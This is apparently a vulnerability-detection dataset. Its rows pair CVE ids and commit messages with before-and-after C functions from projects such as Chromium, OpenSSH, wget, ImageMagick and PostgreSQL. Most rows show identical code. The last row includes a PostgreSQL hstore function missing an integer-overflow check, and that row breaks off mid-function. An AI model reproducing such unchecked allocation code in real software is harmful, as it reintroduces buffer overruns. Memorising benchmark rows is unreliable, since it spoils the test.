CVE-2014-7815 | https://www.cvedetails.com/cve/CVE-2014-7815/ | CWE-264 | https://git.qemu.org/?p=qemu.git;a=commit;h=e6908bfe8e07f2b452e78e677da1b45b1c0f6829 | e6908bfe8e07f2b452e78e677da1b45b1c0f6829 | null | void buffer_reserve(Buffer *buffer, size_t len)
{
if ((buffer->capacity - buffer->offset) < len) {
buffer->capacity += (len + 1024);
buffer->buffer = g_realloc(buffer->buffer, buffer->capacity);
if (buffer->buffer == NULL) {
fprintf(stderr, "vnc: out of memory\n");
exit(1);
}
}
}
| void buffer_reserve(Buffer *buffer, size_t len)
{
if ((buffer->capacity - buffer->offset) < len) {
buffer->capacity += (len + 1024);
buffer->buffer = g_realloc(buffer->buffer, buffer->capacity);
if (buffer->buffer == NULL) {
fprintf(stderr, "vnc: out of memory\n");
exit(1);
}
}
}
| C | qemu | 0 |
CVE-2016-8670 | https://www.cvedetails.com/cve/CVE-2016-8670/ | CWE-119 | https://github.com/libgd/libgd/commit/53110871935244816bbb9d131da0bccff734bfe9 | 53110871935244816bbb9d131da0bccff734bfe9 | Avoid potentially dangerous signed to unsigned conversion
We make sure to never pass a negative `rlen` as size to memcpy(). See
also <https://bugs.php.net/bug.php?id=73280>.
Patch provided by Emmanuel Law. | static int allocDynamic(dynamicPtr *dp, int initialSize, void *data)
{
if(data == NULL) {
dp->logicalSize = 0;
dp->dataGood = FALSE;
dp->data = gdMalloc(initialSize);
} else {
dp->logicalSize = initialSize;
dp->dataGood = TRUE;
dp->data = data;
}
if(dp->data != NULL) {
dp->realSize = initialSize;
dp->dataGood = TRUE;
dp->pos = 0;
return TRUE;
} else {
dp->realSize = 0;
return FALSE;
}
}
| static int allocDynamic(dynamicPtr *dp, int initialSize, void *data)
{
if(data == NULL) {
dp->logicalSize = 0;
dp->dataGood = FALSE;
dp->data = gdMalloc(initialSize);
} else {
dp->logicalSize = initialSize;
dp->dataGood = TRUE;
dp->data = data;
}
if(dp->data != NULL) {
dp->realSize = initialSize;
dp->dataGood = TRUE;
dp->pos = 0;
return TRUE;
} else {
dp->realSize = 0;
return FALSE;
}
}
| C | libgd | 0 |
CVE-2016-1690 | https://www.cvedetails.com/cve/CVE-2016-1690/ | null | https://github.com/chromium/chromium/commit/9de81f45c73a8f9f215fc234a6adfe087b0eab74 | 9de81f45c73a8f9f215fc234a6adfe087b0eab74 | Remove WeakPtrFactory from PasswordAutofillAgent
Unlike in AutofillAgent, the factory is no longer used in PAA.
R=dvadym@chromium.org
BUG=609010,609007,608100,608101,433486
Review-Url: https://codereview.chromium.org/1945723003
Cr-Commit-Position: refs/heads/master@{#391475} | void PasswordAutofillAgent::ClearPreview(
blink::WebInputElement* username,
blink::WebInputElement* password) {
if (!username->isNull() && !username->suggestedValue().isEmpty()) {
username->setSuggestedValue(blink::WebString());
username->setAutofilled(was_username_autofilled_);
username->setSelectionRange(username_query_prefix_.length(),
username->value().length());
}
if (!password->suggestedValue().isEmpty()) {
password->setSuggestedValue(blink::WebString());
password->setAutofilled(was_password_autofilled_);
}
}
| void PasswordAutofillAgent::ClearPreview(
blink::WebInputElement* username,
blink::WebInputElement* password) {
if (!username->isNull() && !username->suggestedValue().isEmpty()) {
username->setSuggestedValue(blink::WebString());
username->setAutofilled(was_username_autofilled_);
username->setSelectionRange(username_query_prefix_.length(),
username->value().length());
}
if (!password->suggestedValue().isEmpty()) {
password->setSuggestedValue(blink::WebString());
password->setAutofilled(was_password_autofilled_);
}
}
| C | Chrome | 0 |
CVE-2013-2909 | https://www.cvedetails.com/cve/CVE-2013-2909/ | CWE-399 | https://github.com/chromium/chromium/commit/248a92c21c20c14b5983680c50e1d8b73fc79a2f | 248a92c21c20c14b5983680c50e1d8b73fc79a2f | Update containtingIsolate to go back all the way to top isolate from current root, rather than stopping at the first isolate it finds. This works because the current root is always updated with each isolate run.
BUG=279277
Review URL: https://chromiumcodereview.appspot.com/23972003
git-svn-id: svn://svn.chromium.org/blink/trunk@157268 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | static inline void setupResolverToResumeInIsolate(InlineBidiResolver& resolver, RenderObject* root, RenderObject* startObject)
{
if (root != startObject) {
RenderObject* parent = startObject->parent();
setupResolverToResumeInIsolate(resolver, root, parent);
notifyObserverEnteredObject(&resolver, startObject);
}
}
| static inline void setupResolverToResumeInIsolate(InlineBidiResolver& resolver, RenderObject* root, RenderObject* startObject)
{
if (root != startObject) {
RenderObject* parent = startObject->parent();
setupResolverToResumeInIsolate(resolver, root, parent);
notifyObserverEnteredObject(&resolver, startObject);
}
}
| C | Chrome | 0 |
CVE-2016-3878 | https://www.cvedetails.com/cve/CVE-2016-3878/ | CWE-284 | https://android.googlesource.com/platform/external/libavc/+/7109ce3f8f90a28ca9f0ee6e14f6ac5e414c62cf | 7109ce3f8f90a28ca9f0ee6e14f6ac5e414c62cf | Fixed error concealment when no MBs are decoded in the current pic
Bug: 29493002
Change-Id: I3fae547ddb0616b4e6579580985232bd3d65881e
| WORD32 ih264d_reset(iv_obj_t *dec_hdl, void *pv_api_ip, void *pv_api_op)
{
dec_struct_t * ps_dec;
ivd_ctl_reset_op_t *ps_ctl_op = (ivd_ctl_reset_op_t *)pv_api_op;
UNUSED(pv_api_ip);
ps_ctl_op->u4_error_code = 0;
ps_dec = (dec_struct_t *)(dec_hdl->pv_codec_handle);
if(ps_dec != NULL)
{
ih264d_init_decoder(ps_dec);
}
else
{
H264_DEC_DEBUG_PRINT(
"\nReset called without Initializing the decoder\n");
ps_ctl_op->u4_error_code = ERROR_INIT_NOT_DONE;
}
return IV_SUCCESS;
}
| WORD32 ih264d_reset(iv_obj_t *dec_hdl, void *pv_api_ip, void *pv_api_op)
{
dec_struct_t * ps_dec;
ivd_ctl_reset_op_t *ps_ctl_op = (ivd_ctl_reset_op_t *)pv_api_op;
UNUSED(pv_api_ip);
ps_ctl_op->u4_error_code = 0;
ps_dec = (dec_struct_t *)(dec_hdl->pv_codec_handle);
if(ps_dec != NULL)
{
ih264d_init_decoder(ps_dec);
}
else
{
H264_DEC_DEBUG_PRINT(
"\nReset called without Initializing the decoder\n");
ps_ctl_op->u4_error_code = ERROR_INIT_NOT_DONE;
}
return IV_SUCCESS;
}
| C | Android | 0 |
null | null | null | https://github.com/chromium/chromium/commit/181c7400b2bf50ba02ac77149749fb419b4d4797 | 181c7400b2bf50ba02ac77149749fb419b4d4797 | gpu: Use GetUniformSetup computed result size.
R=piman@chromium.org
BUG=468936
Review URL: https://codereview.chromium.org/1016193003
Cr-Commit-Position: refs/heads/master@{#321489} | error::Error GLES2DecoderImpl::DoCommandsImpl(unsigned int num_commands,
const void* buffer,
int num_entries,
int* entries_processed) {
commands_to_process_ = num_commands;
error::Error result = error::kNoError;
const CommandBufferEntry* cmd_data =
static_cast<const CommandBufferEntry*>(buffer);
int process_pos = 0;
unsigned int command = 0;
while (process_pos < num_entries && result == error::kNoError &&
commands_to_process_--) {
const unsigned int size = cmd_data->value_header.size;
command = cmd_data->value_header.command;
if (size == 0) {
result = error::kInvalidSize;
break;
}
if (static_cast<int>(size) + process_pos > num_entries) {
result = error::kOutOfBounds;
break;
}
if (DebugImpl) {
TRACE_EVENT_BEGIN0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
if (log_commands()) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "]"
<< "cmd: " << GetCommandName(command);
}
}
const unsigned int arg_count = size - 1;
unsigned int command_index = command - kStartPoint - 1;
if (command_index < arraysize(command_info)) {
const CommandInfo& info = command_info[command_index];
unsigned int info_arg_count = static_cast<unsigned int>(info.arg_count);
if ((info.arg_flags == cmd::kFixed && arg_count == info_arg_count) ||
(info.arg_flags == cmd::kAtLeastN && arg_count >= info_arg_count)) {
bool doing_gpu_trace = false;
if (DebugImpl && gpu_trace_commands_) {
if (CMD_FLAG_GET_TRACE_LEVEL(info.cmd_flags) <= gpu_trace_level_) {
doing_gpu_trace = true;
gpu_tracer_->Begin(TRACE_DISABLED_BY_DEFAULT("gpu_decoder"),
GetCommandName(command),
kTraceDecoder);
}
}
uint32 immediate_data_size = (arg_count - info_arg_count) *
sizeof(CommandBufferEntry); // NOLINT
result = (this->*info.cmd_handler)(immediate_data_size, cmd_data);
if (DebugImpl && doing_gpu_trace)
gpu_tracer_->End(kTraceDecoder);
if (DebugImpl && debug()) {
GLenum error;
while ((error = glGetError()) != GL_NO_ERROR) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "] "
<< "GL ERROR: " << GLES2Util::GetStringEnum(error)
<< " : " << GetCommandName(command);
LOCAL_SET_GL_ERROR(error, "DoCommand", "GL error from driver");
}
}
} else {
result = error::kInvalidArguments;
}
} else {
result = DoCommonCommand(command, arg_count, cmd_data);
}
if (DebugImpl) {
TRACE_EVENT_END0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
}
if (result == error::kNoError &&
current_decoder_error_ != error::kNoError) {
result = current_decoder_error_;
current_decoder_error_ = error::kNoError;
}
if (result != error::kDeferCommandUntilLater) {
process_pos += size;
cmd_data += size;
}
}
if (entries_processed)
*entries_processed = process_pos;
if (error::IsError(result)) {
LOG(ERROR) << "Error: " << result << " for Command "
<< GetCommandName(command);
}
return result;
}
| error::Error GLES2DecoderImpl::DoCommandsImpl(unsigned int num_commands,
const void* buffer,
int num_entries,
int* entries_processed) {
commands_to_process_ = num_commands;
error::Error result = error::kNoError;
const CommandBufferEntry* cmd_data =
static_cast<const CommandBufferEntry*>(buffer);
int process_pos = 0;
unsigned int command = 0;
while (process_pos < num_entries && result == error::kNoError &&
commands_to_process_--) {
const unsigned int size = cmd_data->value_header.size;
command = cmd_data->value_header.command;
if (size == 0) {
result = error::kInvalidSize;
break;
}
if (static_cast<int>(size) + process_pos > num_entries) {
result = error::kOutOfBounds;
break;
}
if (DebugImpl) {
TRACE_EVENT_BEGIN0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
if (log_commands()) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "]"
<< "cmd: " << GetCommandName(command);
}
}
const unsigned int arg_count = size - 1;
unsigned int command_index = command - kStartPoint - 1;
if (command_index < arraysize(command_info)) {
const CommandInfo& info = command_info[command_index];
unsigned int info_arg_count = static_cast<unsigned int>(info.arg_count);
if ((info.arg_flags == cmd::kFixed && arg_count == info_arg_count) ||
(info.arg_flags == cmd::kAtLeastN && arg_count >= info_arg_count)) {
bool doing_gpu_trace = false;
if (DebugImpl && gpu_trace_commands_) {
if (CMD_FLAG_GET_TRACE_LEVEL(info.cmd_flags) <= gpu_trace_level_) {
doing_gpu_trace = true;
gpu_tracer_->Begin(TRACE_DISABLED_BY_DEFAULT("gpu_decoder"),
GetCommandName(command),
kTraceDecoder);
}
}
uint32 immediate_data_size = (arg_count - info_arg_count) *
sizeof(CommandBufferEntry); // NOLINT
result = (this->*info.cmd_handler)(immediate_data_size, cmd_data);
if (DebugImpl && doing_gpu_trace)
gpu_tracer_->End(kTraceDecoder);
if (DebugImpl && debug()) {
GLenum error;
while ((error = glGetError()) != GL_NO_ERROR) {
LOG(ERROR) << "[" << logger_.GetLogPrefix() << "] "
<< "GL ERROR: " << GLES2Util::GetStringEnum(error)
<< " : " << GetCommandName(command);
LOCAL_SET_GL_ERROR(error, "DoCommand", "GL error from driver");
}
}
} else {
result = error::kInvalidArguments;
}
} else {
result = DoCommonCommand(command, arg_count, cmd_data);
}
if (DebugImpl) {
TRACE_EVENT_END0(TRACE_DISABLED_BY_DEFAULT("cb_command"),
GetCommandName(command));
}
if (result == error::kNoError &&
current_decoder_error_ != error::kNoError) {
result = current_decoder_error_;
current_decoder_error_ = error::kNoError;
}
if (result != error::kDeferCommandUntilLater) {
process_pos += size;
cmd_data += size;
}
}
if (entries_processed)
*entries_processed = process_pos;
if (error::IsError(result)) {
LOG(ERROR) << "Error: " << result << " for Command "
<< GetCommandName(command);
}
return result;
}
| C | Chrome | 0 |
CVE-2016-10012 | https://www.cvedetails.com/cve/CVE-2016-10012/ | CWE-119 | https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9 | 3095060f479b86288e31c79ecbc5131a66bcd2f9 | Remove support for pre-authentication compression. Doing compression
early in the protocol probably seemed reasonable in the 1990s, but
today it's clearly a bad idea in terms of both cryptography (cf.
multiple compression oracle attacks in TLS) and attack surface.
Moreover, to support it across privilege-separation zlib needed
the assistance of a complex shared-memory manager that made the
required attack surface considerably larger.
Prompted by Guido Vranken pointing out a compiler-elided security
check in the shared memory manager found by Stack
(http://css.csail.mit.edu/stack/); ok deraadt@ markus@
NB. pre-auth authentication has been disabled by default in sshd
for >10 years. | mm_answer_gss_setup_ctx(int sock, Buffer *m)
{
gss_OID_desc goid;
OM_uint32 major;
u_int len;
if (!options.gss_authentication)
fatal("%s: GSSAPI authentication not enabled", __func__);
goid.elements = buffer_get_string(m, &len);
goid.length = len;
major = ssh_gssapi_server_ctx(&gsscontext, &goid);
free(goid.elements);
buffer_clear(m);
buffer_put_int(m, major);
mm_request_send(sock, MONITOR_ANS_GSSSETUP, m);
/* Now we have a context, enable the step */
monitor_permit(mon_dispatch, MONITOR_REQ_GSSSTEP, 1);
return (0);
}
| mm_answer_gss_setup_ctx(int sock, Buffer *m)
{
gss_OID_desc goid;
OM_uint32 major;
u_int len;
if (!options.gss_authentication)
fatal("%s: GSSAPI authentication not enabled", __func__);
goid.elements = buffer_get_string(m, &len);
goid.length = len;
major = ssh_gssapi_server_ctx(&gsscontext, &goid);
free(goid.elements);
buffer_clear(m);
buffer_put_int(m, major);
mm_request_send(sock, MONITOR_ANS_GSSSETUP, m);
/* Now we have a context, enable the step */
monitor_permit(mon_dispatch, MONITOR_REQ_GSSSTEP, 1);
return (0);
}
| C | src | 0 |
CVE-2016-5170 | https://www.cvedetails.com/cve/CVE-2016-5170/ | CWE-416 | https://github.com/chromium/chromium/commit/c3957448cfc6e299165196a33cd954b790875fdb | c3957448cfc6e299165196a33cd954b790875fdb | Cleanup and remove dead code in SetFocusedElement
This early-out was added in:
https://crrev.com/ce8ea3446283965c7eabab592cbffe223b1cf2bc
Back then, we applied fragment focus in LayoutUpdated() which could
cause this issue. This got cleaned up in:
https://crrev.com/45236fd563e9df53dc45579be1f3d0b4784885a2
so that focus is no longer applied after layout.
+Cleanup: Goto considered harmful
Bug: 795381
Change-Id: Ifeb4d2e03e872fd48cca6720b1d4de36ad1ecbb7
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1524417
Commit-Queue: David Bokan <bokan@chromium.org>
Reviewed-by: Stefan Zager <szager@chromium.org>
Cr-Commit-Position: refs/heads/master@{#641101} | Location* Document::location() const {
if (!GetFrame())
return nullptr;
return domWindow()->location();
}
| Location* Document::location() const {
if (!GetFrame())
return nullptr;
return domWindow()->location();
}
| C | Chrome | 0 |
CVE-2016-10133 | https://www.cvedetails.com/cve/CVE-2016-10133/ | CWE-119 | http://git.ghostscript.com/?p=mujs.git;a=commit;h=77ab465f1c394bb77f00966cd950650f3f53cb24 | 77ab465f1c394bb77f00966cd950650f3f53cb24 | null | static void jsR_pushtrace(js_State *J, const char *name, const char *file, int line)
{
if (J->tracetop + 1 == JS_ENVLIMIT)
js_error(J, "call stack overflow");
++J->tracetop;
J->trace[J->tracetop].name = name;
J->trace[J->tracetop].file = file;
J->trace[J->tracetop].line = line;
}
| static void jsR_pushtrace(js_State *J, const char *name, const char *file, int line)
{
if (J->tracetop + 1 == JS_ENVLIMIT)
js_error(J, "call stack overflow");
++J->tracetop;
J->trace[J->tracetop].name = name;
J->trace[J->tracetop].file = file;
J->trace[J->tracetop].line = line;
}
| C | ghostscript | 0 |
CVE-2017-6508 | https://www.cvedetails.com/cve/CVE-2017-6508/ | CWE-93 | https://git.savannah.gnu.org/cgit/wget.git/commit/?id=4d729e322fae359a1aefaafec1144764a54e8ad4 | 4d729e322fae359a1aefaafec1144764a54e8ad4 | null | sync_path (struct url *u)
{
char *newpath, *efile, *edir;
xfree (u->path);
/* u->dir and u->file are not escaped. URL-escape them before
reassembling them into u->path. That way, if they contain
separators like '?' or even if u->file contains slashes, the
path will be correctly assembled. (u->file can contain slashes
if the URL specifies it with %2f, or if an FTP server returns
it.) */
edir = url_escape_dir (u->dir);
efile = url_escape_1 (u->file, urlchr_unsafe | urlchr_reserved, 1);
if (!*edir)
newpath = xstrdup (efile);
else
{
int dirlen = strlen (edir);
int filelen = strlen (efile);
/* Copy "DIR/FILE" to newpath. */
char *p = newpath = xmalloc (dirlen + 1 + filelen + 1);
memcpy (p, edir, dirlen);
p += dirlen;
*p++ = '/';
memcpy (p, efile, filelen);
p += filelen;
*p = '\0';
}
u->path = newpath;
if (edir != u->dir)
xfree (edir);
if (efile != u->file)
xfree (efile);
/* Regenerate u->url as well. */
xfree (u->url);
u->url = url_string (u, URL_AUTH_SHOW);
}
| sync_path (struct url *u)
{
char *newpath, *efile, *edir;
xfree (u->path);
/* u->dir and u->file are not escaped. URL-escape them before
reassembling them into u->path. That way, if they contain
separators like '?' or even if u->file contains slashes, the
path will be correctly assembled. (u->file can contain slashes
if the URL specifies it with %2f, or if an FTP server returns
it.) */
edir = url_escape_dir (u->dir);
efile = url_escape_1 (u->file, urlchr_unsafe | urlchr_reserved, 1);
if (!*edir)
newpath = xstrdup (efile);
else
{
int dirlen = strlen (edir);
int filelen = strlen (efile);
/* Copy "DIR/FILE" to newpath. */
char *p = newpath = xmalloc (dirlen + 1 + filelen + 1);
memcpy (p, edir, dirlen);
p += dirlen;
*p++ = '/';
memcpy (p, efile, filelen);
p += filelen;
*p = '\0';
}
u->path = newpath;
if (edir != u->dir)
xfree (edir);
if (efile != u->file)
xfree (efile);
/* Regenerate u->url as well. */
xfree (u->url);
u->url = url_string (u, URL_AUTH_SHOW);
}
| C | savannah | 0 |
CVE-2019-14980 | https://www.cvedetails.com/cve/CVE-2019-14980/ | CWE-416 | https://github.com/ImageMagick/ImageMagick6/commit/614a257295bdcdeda347086761062ac7658b6830 | 614a257295bdcdeda347086761062ac7658b6830 | https://github.com/ImageMagick/ImageMagick6/issues/43 | MagickExport MagickOffsetType SeekBlob(Image *image,
const MagickOffsetType offset,const int whence)
{
BlobInfo
*magick_restrict blob_info;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(image->blob != (BlobInfo *) NULL);
assert(image->blob->type != UndefinedStream);
blob_info=image->blob;
switch (blob_info->type)
{
case UndefinedStream:
break;
case StandardStream:
case PipeStream:
return(-1);
case FileStream:
{
if ((offset < 0) && (whence == SEEK_SET))
return(-1);
if (fseek(blob_info->file_info.file,offset,whence) < 0)
return(-1);
blob_info->offset=TellBlob(image);
break;
}
case ZipStream:
{
#if defined(MAGICKCORE_ZLIB_DELEGATE)
if (gzseek(blob_info->file_info.gzfile,(off_t) offset,whence) < 0)
return(-1);
#endif
blob_info->offset=TellBlob(image);
break;
}
case BZipStream:
return(-1);
case FifoStream:
return(-1);
case BlobStream:
{
switch (whence)
{
case SEEK_SET:
default:
{
if (offset < 0)
return(-1);
blob_info->offset=offset;
break;
}
case SEEK_CUR:
{
if (((offset > 0) && (blob_info->offset > (SSIZE_MAX-offset))) ||
((offset < 0) && (blob_info->offset < (-SSIZE_MAX-offset))))
{
errno=EOVERFLOW;
return(-1);
}
if ((blob_info->offset+offset) < 0)
return(-1);
blob_info->offset+=offset;
break;
}
case SEEK_END:
{
if (((MagickOffsetType) blob_info->length+offset) < 0)
return(-1);
blob_info->offset=blob_info->length+offset;
break;
}
}
if (blob_info->offset < (MagickOffsetType) ((off_t) blob_info->length))
{
blob_info->eof=MagickFalse;
break;
}
if (blob_info->offset >= (MagickOffsetType) ((off_t) blob_info->extent))
return(-1);
break;
}
}
return(blob_info->offset);
}
| MagickExport MagickOffsetType SeekBlob(Image *image,
const MagickOffsetType offset,const int whence)
{
BlobInfo
*magick_restrict blob_info;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(image->blob != (BlobInfo *) NULL);
assert(image->blob->type != UndefinedStream);
blob_info=image->blob;
switch (blob_info->type)
{
case UndefinedStream:
break;
case StandardStream:
case PipeStream:
return(-1);
case FileStream:
{
if ((offset < 0) && (whence == SEEK_SET))
return(-1);
if (fseek(blob_info->file_info.file,offset,whence) < 0)
return(-1);
blob_info->offset=TellBlob(image);
break;
}
case ZipStream:
{
#if defined(MAGICKCORE_ZLIB_DELEGATE)
if (gzseek(blob_info->file_info.gzfile,(off_t) offset,whence) < 0)
return(-1);
#endif
blob_info->offset=TellBlob(image);
break;
}
case BZipStream:
return(-1);
case FifoStream:
return(-1);
case BlobStream:
{
switch (whence)
{
case SEEK_SET:
default:
{
if (offset < 0)
return(-1);
blob_info->offset=offset;
break;
}
case SEEK_CUR:
{
if (((offset > 0) && (blob_info->offset > (SSIZE_MAX-offset))) ||
((offset < 0) && (blob_info->offset < (-SSIZE_MAX-offset))))
{
errno=EOVERFLOW;
return(-1);
}
if ((blob_info->offset+offset) < 0)
return(-1);
blob_info->offset+=offset;
break;
}
case SEEK_END:
{
if (((MagickOffsetType) blob_info->length+offset) < 0)
return(-1);
blob_info->offset=blob_info->length+offset;
break;
}
}
if (blob_info->offset < (MagickOffsetType) ((off_t) blob_info->length))
{
blob_info->eof=MagickFalse;
break;
}
if (blob_info->offset >= (MagickOffsetType) ((off_t) blob_info->extent))
return(-1);
break;
}
}
return(blob_info->offset);
}
| C | ImageMagick6 | 0 |
CVE-2016-5194 | null | null | https://github.com/chromium/chromium/commit/d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | Clear Shill stub config in offline file manager tests
The Shill stub client fakes ethernet and wifi connections during
testing. Clear its config during offline tests to simulate a lack of
network connectivity.
As a side effect, fileManagerPrivate.getDriveConnectionState will no
longer need to be stubbed out, as it will now think the device is
offline and return the appropriate result.
Bug: 925272
Change-Id: Idd6cb44325cfde4991d3b1e64185a28e8655c733
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1578149
Commit-Queue: Austin Tankiang <austinct@chromium.org>
Reviewed-by: Sam McNally <sammc@chromium.org>
Cr-Commit-Position: refs/heads/master@{#654782} | bool FileManagerBrowserTestBase::GetNeedsZipSupport() const {
return false;
}
| bool FileManagerBrowserTestBase::GetNeedsZipSupport() const {
return false;
}
| C | Chrome | 0 |
CVE-2011-3964 | https://www.cvedetails.com/cve/CVE-2011-3964/ | null | https://github.com/chromium/chromium/commit/0c14577c9905bd8161159ec7eaac810c594508d0 | 0c14577c9905bd8161159ec7eaac810c594508d0 | Change omnibox behavior when stripping javascript schema to navigate after stripping the schema on drag drop.
BUG=109245
TEST=N/A
Review URL: http://codereview.chromium.org/9116016
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@116692 0039d316-1c4b-4281-b951-d872f2087c98 | void OmniboxViewWin::OnLButtonUp(UINT keys, const CPoint& point) {
ScopedFreeze freeze(this, GetTextObjectModel());
DefWindowProc(WM_LBUTTONUP, keys,
MAKELPARAM(ClipXCoordToVisibleText(point.x, false), point.y));
SelectAllIfNecessary(kLeft, point);
tracking_click_[kLeft] = false;
possible_drag_ = false;
}
| void OmniboxViewWin::OnLButtonUp(UINT keys, const CPoint& point) {
ScopedFreeze freeze(this, GetTextObjectModel());
DefWindowProc(WM_LBUTTONUP, keys,
MAKELPARAM(ClipXCoordToVisibleText(point.x, false), point.y));
SelectAllIfNecessary(kLeft, point);
tracking_click_[kLeft] = false;
possible_drag_ = false;
}
| C | Chrome | 0 |
CVE-2015-1300 | https://www.cvedetails.com/cve/CVE-2015-1300/ | CWE-254 | https://github.com/chromium/chromium/commit/9c391ac04f9ac478c8b0e43b359c2b43a6c892ab | 9c391ac04f9ac478c8b0e43b359c2b43a6c892ab | Use pdf compositor service for printing when OOPIF is enabled
When OOPIF is enabled (by site-per-process flag or
top-document-isolation feature), use the pdf compositor service for
converting PaintRecord to PDF on renderers.
In the future, this will make compositing PDF from multiple renderers
possible.
TBR=jzfeng@chromium.org
BUG=455764
Change-Id: I3c28f03f4358e4228239fe1a33384f85e7716e8f
Reviewed-on: https://chromium-review.googlesource.com/699765
Commit-Queue: Wei Li <weili@chromium.org>
Reviewed-by: Daniel Cheng <dcheng@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>
Cr-Commit-Position: refs/heads/master@{#511616} | static void Create(chrome::mojom::SafeArchiveAnalyzerRequest request) {
mojo::MakeStrongBinding(base::MakeUnique<SafeArchiveAnalyzerImpl>(),
std::move(request));
}
| static void Create(chrome::mojom::SafeArchiveAnalyzerRequest request) {
mojo::MakeStrongBinding(base::MakeUnique<SafeArchiveAnalyzerImpl>(),
std::move(request));
}
| C | Chrome | 0 |
CVE-2014-2669 | https://www.cvedetails.com/cve/CVE-2014-2669/ | CWE-189 | https://github.com/postgres/postgres/commit/31400a673325147e1205326008e32135a78b4d8a | 31400a673325147e1205326008e32135a78b4d8a | Predict integer overflow to avoid buffer overruns.
Several functions, mostly type input functions, calculated an allocation
size such that the calculation wrapped to a small positive value when
arguments implied a sufficiently-large requirement. Writes past the end
of the inadvertent small allocation followed shortly thereafter.
Coverity identified the path_in() vulnerability; code inspection led to
the rest. In passing, add check_stack_depth() to prevent stack overflow
in related functions.
Back-patch to 8.4 (all supported versions). The non-comment hstore
changes touch code that did not exist in 8.4, so that part stops at 9.0.
Noah Misch and Heikki Linnakangas, reviewed by Tom Lane.
Security: CVE-2014-0064 | hstore_from_array(PG_FUNCTION_ARGS)
{
ArrayType *in_array = PG_GETARG_ARRAYTYPE_P(0);
int ndims = ARR_NDIM(in_array);
int count;
int32 buflen;
HStore *out;
Pairs *pairs;
Datum *in_datums;
bool *in_nulls;
int in_count;
int i;
Assert(ARR_ELEMTYPE(in_array) == TEXTOID);
switch (ndims)
{
case 0:
out = hstorePairs(NULL, 0, 0);
PG_RETURN_POINTER(out);
case 1:
if ((ARR_DIMS(in_array)[0]) % 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have even number of elements")));
break;
case 2:
if ((ARR_DIMS(in_array)[1]) != 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have two columns")));
break;
default:
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("wrong number of array subscripts")));
}
deconstruct_array(in_array,
TEXTOID, -1, false, 'i',
&in_datums, &in_nulls, &in_count);
count = in_count / 2;
/* see discussion in hstoreArrayToPairs() */
if (count > MaxAllocSize / sizeof(Pairs))
ereport(ERROR,
(errcode(ERRCODE_PROGRAM_LIMIT_EXCEEDED),
errmsg("number of pairs (%d) exceeds the maximum allowed (%d)",
count, (int) (MaxAllocSize / sizeof(Pairs)))));
pairs = palloc(count * sizeof(Pairs));
for (i = 0; i < count; ++i)
{
if (in_nulls[i * 2])
ereport(ERROR,
(errcode(ERRCODE_NULL_VALUE_NOT_ALLOWED),
errmsg("null value not allowed for hstore key")));
if (in_nulls[i * 2 + 1])
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = NULL;
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = 4;
pairs[i].isnull = true;
pairs[i].needfree = false;
}
else
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = VARDATA_ANY(in_datums[i * 2 + 1]);
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = hstoreCheckValLen(VARSIZE_ANY_EXHDR(in_datums[i * 2 + 1]));
pairs[i].isnull = false;
pairs[i].needfree = false;
}
}
count = hstoreUniquePairs(pairs, count, &buflen);
out = hstorePairs(pairs, count, buflen);
PG_RETURN_POINTER(out);
}
| hstore_from_array(PG_FUNCTION_ARGS)
{
ArrayType *in_array = PG_GETARG_ARRAYTYPE_P(0);
int ndims = ARR_NDIM(in_array);
int count;
int32 buflen;
HStore *out;
Pairs *pairs;
Datum *in_datums;
bool *in_nulls;
int in_count;
int i;
Assert(ARR_ELEMTYPE(in_array) == TEXTOID);
switch (ndims)
{
case 0:
out = hstorePairs(NULL, 0, 0);
PG_RETURN_POINTER(out);
case 1:
if ((ARR_DIMS(in_array)[0]) % 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have even number of elements")));
break;
case 2:
if ((ARR_DIMS(in_array)[1]) != 2)
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("array must have two columns")));
break;
default:
ereport(ERROR,
(errcode(ERRCODE_ARRAY_SUBSCRIPT_ERROR),
errmsg("wrong number of array subscripts")));
}
deconstruct_array(in_array,
TEXTOID, -1, false, 'i',
&in_datums, &in_nulls, &in_count);
count = in_count / 2;
pairs = palloc(count * sizeof(Pairs));
for (i = 0; i < count; ++i)
{
if (in_nulls[i * 2])
ereport(ERROR,
(errcode(ERRCODE_NULL_VALUE_NOT_ALLOWED),
errmsg("null value not allowed for hstore key")));
if (in_nulls[i * 2 + 1])
{
pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = NULL;
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = 4;
pairs[i].isnull = true;
pairs[i].needfree = false;
}
else
{
